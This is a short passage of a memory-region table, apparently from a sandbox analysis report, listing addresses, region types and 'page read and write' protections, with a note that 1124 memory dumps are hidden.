page read and write
|
||
|
7FF847B50000
|
trusted library allocation
|
page read and write
|
||
|
1801B620000
|
heap
|
page read and write
|
There are 1124 hidden memdumps, click here to show them.